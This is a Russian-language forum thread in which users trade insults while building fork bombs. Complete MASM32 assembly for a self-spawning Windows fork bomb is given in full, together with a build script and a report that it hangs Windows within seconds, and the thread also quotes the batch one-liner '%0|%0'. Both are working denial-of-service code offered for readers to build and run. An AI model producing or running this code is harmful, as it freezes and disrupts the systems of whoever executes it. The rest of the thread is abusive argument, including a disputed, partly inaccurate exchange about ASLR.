Вы не вошли.

Svart Testare,
один голос есть.
дайте высказаться остальным.
под все Windows я этот геморрой повторять точно не стану… 
all your post are belong to us.

Нормальный человек при создании батника может сделать следующее:нажмёт правой кнопкой мыши, создать файл, текстовый файл. А потом тупо переименует с расширением .bat
Ну так поступила бы малограмотная продавщица гастронома. А грамотный человек задаст имя при сохранении файла.
«Коллективная глупость — индивидуальный признак толпы» © SLOR, 28 апреля 2011 г.
«Где пьёт толпа, все родники отравлены» © Фридрих Ницше.
Requiescat in pace, SLOR! © Уход Hedge 24 мая 2011 г.

Ну так поступила бы малограмотная продавщица гастронома. А грамотный человек задаст имя при сохранении файла.
Глупый спор. Все останутся при своём мнении.

в связи с тем, что мой вопрос ушёл на предыдущую страницу, продублирую здесь:
так, по-моему я сумел разобраться с вызовом WinAPI посредством ассемблерной команды SYSENTER.
сейчас единственное, что удерживает меня от выкладывания кода минимального PE EXE-приложения (порядка 400 байт), выполняющего то же самое, что исходная программа для Linux — это различия ABI ядра Windows в зависимости от версии: www.metasploit.com/users/opcode/syscalls.html.
итак, под какую систему выкладывать код: XP, Vista или 7?

Семёрочку в студию)

так, по-моему я сумел разобраться с вызовом WinAPI посредством ассемблерной команды SYSENTER.
сейчас единственное, что удерживает меня от выкладывания кода минимального PE EXE-приложения (порядка 400 байт), выполняющего то же самое, что исходная программа для Linux — это различия ABI ядра Windows в зависимости от версии: www.metasploit.com/users/opcode/syscalls.html.
итак, под какую систему выкладывать код: XP, Vista или 7?
МН, тебе чо делать нехер??? Тебе же уже показали 23 байта, если тебе не нравиться формат CMD то конвертируй его в exe video-a.ru/programs/25912-bat-to-exe-co … -1500.htmlзачем такие извраты??? Линух-way????
Господа, вы охуели. Все. ©Cэмен

зачем такие извраты??? Линух-way????
Паш, открываем глазки и читаем:
Svart Testare пишет:музыка вообще ни на секунду не прервалась во время работы бомбы
дело в том, что Ваше решение просто-напросто неэффективно, т.к. крайне мало отношение J суммарного объёма кода к эффективному (т.е. расходуемому непосредственно на создание копий).
изначальный пост, если помните, и был направлен на создание программы с максимально возможным J.
я даже специально приводил сравнение со средствами администрирования, где J ~ 1/90, тогда как в моей программе J = 2/3 (третья инструкция — безусловный переход).Svart Testare пишет:Моя бомба получилась всего 23 байта вместо ваших 45
сравнение не совсем корректно, т.к. у Вас шеллскрипт, а у меня нативный код.
если уж такая пьянка, то можно уложиться и в 5 байт:%0|%0но это не отменит того факта, что эффективность данного подхода весьма низка.
или тебе невдомёк разница между нативным машинным кодом и шелл-кодом? 
если да, то, во-первых посчитай, во сколько команд обойдётся трансляция CMD в машинные команды, и, главное, каков будет размер транслированного решения, и сколько «обвязки» потребуется для того чтобы просто вызвать функцию копирования процесса.
также, добавь сюда затраты на обращение к системе для создания окна, его первичной отрисовки и тому подобного.

сразу оговорюсь, SYSENTER используется просто для чистоты эксперимента, как наиболее близкий к исходному вариант вызова ядерной функции.
при вызове через API, мы потеряем такты на внутрисистемный перевод в тот же самый SYSENTER и непосредственный вызов.
Ты забыл добавить, что это надо запустить под root(Администратором) потому как ядерные функции не вызвать с правами юзера. Не???

Альо, товарищи! Ну будет для семёрки бомба сегодня или нет? Я уже спать хочу!
«Коллективная глупость — индивидуальный признак толпы» © SLOR, 28 апреля 2011 г.
«Где пьёт толпа, все родники отравлены» © Фридрих Ницше.
Requiescat in pace, SLOR! © Уход Hedge 24 мая 2011 г.

Ну будет для семёрки бомба сегодня или нет?
вряд ли.
у меня здесь только ХР и Vista, а мне ещё её тестировать 
прошу подождать до завтра.
ядерные функции не вызвать с правами юзера. Не???
это смотря какие.

или тебе невдомёк разница между нативным машинным кодом и шелл-кодом?
МН, ты тупой штоле??? Какая нах разница каким кодом вызывать??? Ну добавь к окнам CMD еще какой нибудь хрени и получиш свое J \в сторону: блять, упоротый, ниочем какой-то бред несет.

Ну добавь к окнам CMD еще какой нибудь хрени и получиш свое J
ох-ма.
ты бы разобрался сначала, о чём вообще речь.
я стремлюсь к максимальному соотношению (ВНИМАНИЕ!) эффективного кода к суммарному.
эффективный код — это всего несколько PUSH, забивка пары регистров определёнными значениями и вызов SYSENTER.
суммарный код — это, помимо указанного, ещё и вся остальная обвязка, состоящая из обращений к API, создания окон, их прорисовки и всего остального, что ты там хочешь добавить, и что уже за тебя добавил транслятор, в силу неидеальности трансляции.
суммарного кода должен быть как можно МЕНЬШЕ, поскольку размер эффективного — константа (порядка 10-12 байт), и её ничем не изменишь.
ключевую фразу жирным выделять?
Добавлено спустя 06 мин 17 с:
в сторону: блять, упоротый, ниочем какой-то бред несет.
невежда судит точно так: в чём толку не поймёт — то у него пустяк.
И. Крылов

в общем, что мы имеем.
за последние несколько часов, заставить работать PE-файл размером меньше минимального по стандарту (1024 байта) под Windows 7, мне не удалось.
скорее всего, это-таки возможно, но у меня продолжать исследования здесь и сейчас желания нет.
возможно, я ещё напишу по данной теме позднее.
в силу вышесказанного, отпадает необходимость в SYSENTER, а следовательно в вырезании из заголовка таблиц импорта и потере совместимости.
итак, вот он, код:
.386
.model flat, stdcall
includelib c:\masm32\lib\kernel32.lib
externdef _imp__CreateProcessA@40:PTR pr10
.code
@main:
SUB ESP, 31*4;
MOV EDI, ESP;
XOR EAX, EAX;
LEA ECX, [EAX+31];
REP STOSD;
LEA EDI, [ESP+31*4-16];
MOV [ESP+36], EDI;
LEA EDI, [ESP+40];
MOV [ESP+32], EDI;
MOV [ESP], OFFSET @name;
@loop:
CALL _imp__CreateProcessA@40;
SUB ESP, 40;
JMP @loop;
@name DB "forkbomb.exe",0;
end @main;создаём файл forkbomb.asm, переносим туда код, и компилируем с помощью нижеследующего батника:
del forkbomb.exe
C:\MASM32\BIN\Ml.exe /c /coff forkbomb.asm
C:\MASM32\BIN\PoLink.exe /SUBSYSTEM:WINDOWS /merge:.data=.text forkbomb.obj
del forkbomb.obj
pauseдля компиляции потребуется пакет MASM32, который можно загрузить вот отсюда.
напоследок, несколько слов о кардинальных отличиях между Windows- и Linux-версиями.
код для Windows использует API-функцию CreateProcess, которая не копирует уже созданный процесс (что избавило бы ОС от необходимости повторно проводить инициализацию памяти, создание потока, его запуск и проч.), а создаёт новый.
это приводит к куда большему проценту системного времени в общем времени исполнения, а также предоставляет пользователю больше времени на администрирование, до того как ОС зависнет «наглухо»: 12 секунд против 1-й на Linux, на идентичном оборудовании.
что называется, достоинства есть продолжение недостатков 
впрочем, справедливости ради, и там и там, при попытке убить первичный процесс бомбы (что автоматически прикончило бы всех потомков на Linux, равно как и на Windows, если было выбрано «Kill Process Tree»), на дальнейший пользовательский ввод ни та, ни другая системы не реагировали.

Майор Очевидность, у меня под Вин7 ничего не происходило. Никаких окошек и т.д. Процессор нагружен на 60-70%, но вполне работает.

за последние несколько часов, заставить работать PE-файл размером меньше минимального по стандарту (1024 байта) под Windows 7, мне не удалось.
Неасилил!

Добавлено спустя 09 мин 47 с:
код для Windows использует API-функцию CreateProcess, которая не копирует уже созданный процесс (что избавило бы ОС от необходимости повторно проводить инициализацию памяти, создание потока, его запуск и проч.), а создаёт новый.
это приводит к куда большему проценту системного времени в общем времени исполнения, а также предоставляет пользователю больше времени на администрирование, до того как ОС зависнет «наглухо»: 12 секунд против 1-й на Linux, на идентичном оборудовании.
что называется, достоинства есть продолжение недостатков
ЁО-О. а недостаток ли это??? Судя по этомуru.wikipedia.org/wiki/ASLR так специально задумывалось.

Судя по этомуhttp://ru.wikipedia.org/wiki/ASLR так специально задумывалось.
ээ…
вообще говоря, если бы ты умел внимательно читать, а во-вторых, не полагался бы на википедийных «переводчиков», то увидел бы, что ASLR включается только для бинарей, специально слинкованных под этот ASLR.
если ты мне покажешь, где в моём батнике ключи на линковку с ASLR, я тебе подарю шоколадную мидальку 
Неасилил!
Паш, кто бы говорил.
Ты стандарт PE вообще читал?
у меня под Вин7 ничего не происходило. Никаких окошек и т.д.
а так и задумывалось.
окошек и не должно быть.
просто, как я уже сказал, уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои, и тем самым не дающий запущенным программам захавать все 100% процессорного времени, и как следствие, количество запусков в секунду сильно ограничивается.
иными словами, работе «чистой» FORK-бомбы препятствует сама Windows, в силу особенности своей архитектуры.
называть это достоинством или недостатком не возьмусь: всё зависит от того, как посмотреть.

вообще говоря, если бы ты умел внимательно читать, а во-вторых, не полагался бы на википедийных «переводчиков», то увидел бы, что ASLR включается только для бинарей, специально слинкованных под этот ASLR.
Пруф??? Хотя я и без пруфа вижу что ты несешь абсолютный бред. ASLR-это внутренняя фишка винды, от бинаря никак независимая, ты видимо читал пруф, что я тебе дал, но нихуя не понял как обычно. Ты что в бинаре прописываешь адрес стека или кучи??? Ты можешь указать только начальное смещения в стеке, а все остальное делает система.
Специально для линух-Икпердов, пытающихся осилить Assembler/ ASLR препятсвует таким видам распространенной атаки на приложение как переполнение буфера приводящее к выполнению произвольного кода злоумышленника, то есть если в бинарник что-то дописать и вызвать переполнение буфера, подсунув некоректные данные программе, то получить адрес возврата на начало вредоносного кода попросу невозможно, приложение вывалиться с ошибкой. К слову, такой вид атаки и соотвествющие уязвимости в линухе сплош и рядом, а это так трудно признавать, ведь линух святой да, а винда плохая. 
Добавлено спустя 05 мин 43 с:
а так и задумывалось.
окошек и не должно быть.
просто, как я уже сказал, уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои, и тем самым не дающий запущенным программам захавать все 100% процессорного времени, и как следствие, количество запусков в секунду сильно ограничивается.
иными словами, работе «чистой» FORK-бомбы препятствует сама Windows, в силу особенности своей архитектуры.
называть это достоинством или недостатком не возьмусь: всё зависит от того, как посмотреть.
Конечно, если винда имеет защиты от таких хитрожопых типа тебя, то это конечно же недостаток ибо не укладывается в мировоззрение лунохода- винда дырявая. 
Отредактировано pavel2403 (08-03-11 19:53:57)

Специально для линух-Икпердов, пытающихся осилить Assembler
Етить твою. Пашик, а ты уже осилил? А то я помню твоё дизассемблирование.
Yesterday it worked.
Today it is not working.
Windows is like that.

Етить твою. Пашик, а ты уже осилил? А то я помню твоё дизассемблирование.
О Акуна, привет!!! Я тебя ждал. Ну ка выскажи свое авторитетное мнение по этому вопросу, а то я как бы не совсем уверен, все таки грамотежки по данному вопросу у меня маловато. Я уже думал, когда же ты придешь!!! Только чур, говорить как спец, а не луноход.
Отредактировано pavel2403 (08-03-11 20:20:13)

а то я как бы не совсем уверен,
Ну тогда просвещайся, хотя бы здесь:
sonikelf.info/populyarnye-programmy-pod … ep-i-aslr/
Первым артиклем.
Т.е. ASLR это механизм, позволяющий приложению защититься от специальным образом подсунутых данных.
Yesterday it worked.
Today it is not working.
Windows is like that.

Специально для линух-Икпердов, пытающихся осилить Assembler
я-то его уже давным-давно «осилил».
а вот тебе, видимо, до этого далеко.
Ты что в бинаре прописываешь адрес стека или кучи??? Ты можешь указать только начальное смещения в стеке, а все остальное делает система.
а, вот оно что.
пациент не понимает, чем компиляция отличается от линковки.
итак, краткий ликбез:
если мы линкуем программу без ASLR, то все адреса вызовов, а также базовые адреса кодовой секции, стэка и кучи записываются в бинарь статически.
в том, что предоставил я, это именно так и происходит.
я, кстати, таки и не понял, к чему ты этот ASLR вообще сюда приплёл.
или ты даже принципа FORK-атаки (а также отличий от атак переполнения) не понимаешь?
Конечно, если винда имеет защиты от таких хитрожопых типа тебя, то это конечно же недостаток ибо не укладывается в мировоззрение лунохода- винда дырявая.
Паш, хватит уже перед всеми позориться.
это не метод защиты, это специфика архитектуры.
но ты, видимо, по традиции не понял ни слова из того, что я сказал.

а, вот оно что.
пациент не понимает, чем компиляция отличается от линковки.
итак, краткий ликбез:
если мы линкуем программу без ASLR, то все адреса вызовов, а также базовые адреса кодовой секции, стэка и кучи записываются в бинарь статически.
в том, что предоставил я, это именно так и происходит.
Понятно, убедил.
я, кстати, таки и не понял, к чему ты этот ASLR вообще сюда приплёл.
или ты даже принципа FORK-атаки (а также отличий от атак переполнения) не понимаешь?
Да нет, понимаю, только в том что ты писал
уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои
это думал как бы оно так задумывалось.
Паш, хватит уже перед всеми позориться.
это не метод защиты, это специфика архитектуры.
Я??? Позориться??? Это м..м наверное я пообещал сделать форк-бомбу для винды и обосрался??? Ты ничего не перепутал, луноход??? 

Это м..м наверное я пообещал сделать форк-бомбу для винды и обосрался???
а, т.е. ты даже не компилировал и не запускал.
ну то ж, дело твоё.
а между тем, код работает и в конечном счёте вполне себе успешно подвешивает Винду.
единственное, в чём заключается разница с Linux-версией — в эффективности.
если тебе так будет спокойнее — разница во времени на моей машине (Core 2 Duo T5500/1.66GHz, 1GB) — 12 секунд до зависания Windows против 1 у Linux.
именно объяснением различий в эффективности я здесь и занимался последние несколько сообщений.
но чукча же у нас не читатель, да.
Ты ничего не перепутал, луноход???
нет, марсолёт, я ничего не перепутал 

а, т.е. ты даже не компилировал и не запускал.
ну то ж, дело твоё.
Конечно, ведь в отличие от тебя мне есть чем заняться в свободное время, вместо того, что бы производить манипуляции подпадающие под действие ст 273 УК РФ www.ukru.ru/code/09/273/index.htm. К тому же я как бы верю людям
Майор Очевидность, у меня под Вин7 ничего не происходило. Никаких окошек и т.д. Процессор нагружен на 60-70%, но вполне работает.

Отредактировано pavel2403 (09-03-11 07:57:41)
[ Сгенерировано за 0.011 сек, 7 запросов выполнено - Использовано памяти: 1.82 Мбайт (Пик: 1.9 Мбайт) ]